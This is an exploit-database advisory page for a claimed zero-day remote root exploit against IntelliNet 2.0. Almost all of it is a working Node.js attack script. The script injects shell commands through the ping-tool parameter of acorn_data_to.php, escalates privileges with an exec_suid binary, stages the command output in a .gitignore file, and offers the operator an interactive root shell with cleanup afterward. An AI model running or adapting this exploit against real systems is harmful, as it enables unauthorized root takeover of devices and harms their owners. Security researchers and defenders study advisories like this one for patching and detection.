IntelliNet 2.0 Remote Root

2024.09.03
Credit: Jean Pereira
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#!/usr/local/bin/node const { execSync } = require('child_process'); const readline = require('readline'); let TARGET = ''; let COMMAND = ''; let SESSION = ''; const ESCALATE = '/usr/aes/bin/exec_suid'; console.log(` ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣾⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⢀⣼⣿⣧⣶⣶⣶⣦⣤⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⣠⣾⢿⣿⣿⣿⣏⠉⠉⠛⠛⠿⣷⣕⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⣠⣾⢝⠄⢀⣿⡿⠻⣿⣄⠀⠀⠀⠀⠈⢿⣧⡀⣀⣤⡾⠀⠀⠀ ⠀⠀⠀⢰⣿⡡⠁⠀⠀⣿⡇⠀⠸⣿⣾⡆⠀⠀⣀⣤⣿⣿⠋⠁⠀⠀⠀⠀ ⠀⠀⢀⣷⣿⠃⠀⠀⢸⣿⡇⠀⠀⠹⣿⣷⣴⡾⠟⠉⠸⣿⡇⠀⠀⠀⠀⠀ ⠀⠀⢸⣿⠗⡀⠀⠀⢸⣿⠃⣠⣶⣿⠿⢿⣿⡀⠀⠀⢀⣿⡇⠀⠀⠀⠀⠀ ⠀⠀⠘⡿⡄⣇⠀⣀⣾⣿⡿⠟⠋⠁⠀⠈⢻⣷⣆⡄⢸⣿⡇⠀⠀⠀⠀⠀ ⠀⠀⠀⢻⣷⣿⣿⠿⣿⣧⠀⠀⠀⠀⠀⠀⠀⠻⣿⣷⣿⡟⠀⠀⠀⠀⠀⠀ ⢀⣰⣾⣿⠿⣿⣿⣾⣿⠇⠀⠀⠀⠀⠀⠀⠀⢀⣼⣿⣿⣅⠀⠀⠀⠀⠀⠀ ⠀⠰⠊⠁⠀⠙⠪⣿⣿⣶⣤⣄⣀⣀⣀⣤⣶⣿⠟⠋⠙⢿⣷⡄⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⢀⣿⡟⠺⠭⠭⠿⠿⠿⠟⠋⠁⠀⠀⠀⠀⠙⠏⣦⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⢸⡟⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ╔════════════════════════════════════════════╗ ║ IntelliNet 2.0 Remote Root Exploit (0-Day) ║ ║ Author: Jean Pereira <info@cytres.com> ║ ╚════════════════════════════════════════════╝ `); const cleanUp = () => { execSync( `curl -sL "http://${TARGET}/acorn_data_to.php?cmd=ping-tool&pingAddress=127.0.0.1;rm%20.gitignore;"` ); }; const createShell = (cmd) => { execSync( `curl -sL "http://${TARGET}/acorn_data_to.php?cmd=ping-tool&pingAddress=127.0.0.1;${encodeURIComponent( [ESCALATE, cmd].join(' ') )}%20%3E%20.gitignore;"` ); return execSync(`curl -sL "http://${TARGET}/.gitignore"`).toString().trim(); }; const rl = readline.createInterface({ input: process.stdin, output: process.stdout, }); const interactiveShell = () => { rl.question(`root@${SESSION.slice(8)}:~# `, (currentCommand) => { if (currentCommand.trim() === '!q') { console.log('Cleaning up...'); cleanUp(); rl.close(); } else { COMMAND = currentCommand; let output = createShell(COMMAND); console.log(output); interactiveShell(); } }); }; rl.question('[*] Enter target IP: ', (targetIP) => { TARGET = targetIP; SESSION = createShell('echo a1b2c3d4$HOSTNAME'); if (!SESSION.startsWith('a1b2c3d4')) { console.log('[*] Could not execute payload, aborting'); process.exit(0); } else { console.log('[*] Payload injected to firmware'); console.log('[*] Launching root shell via exec_suid'); } console.log(''); interactiveShell(); }); rl.on('close', () => { process.exit(0); });


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top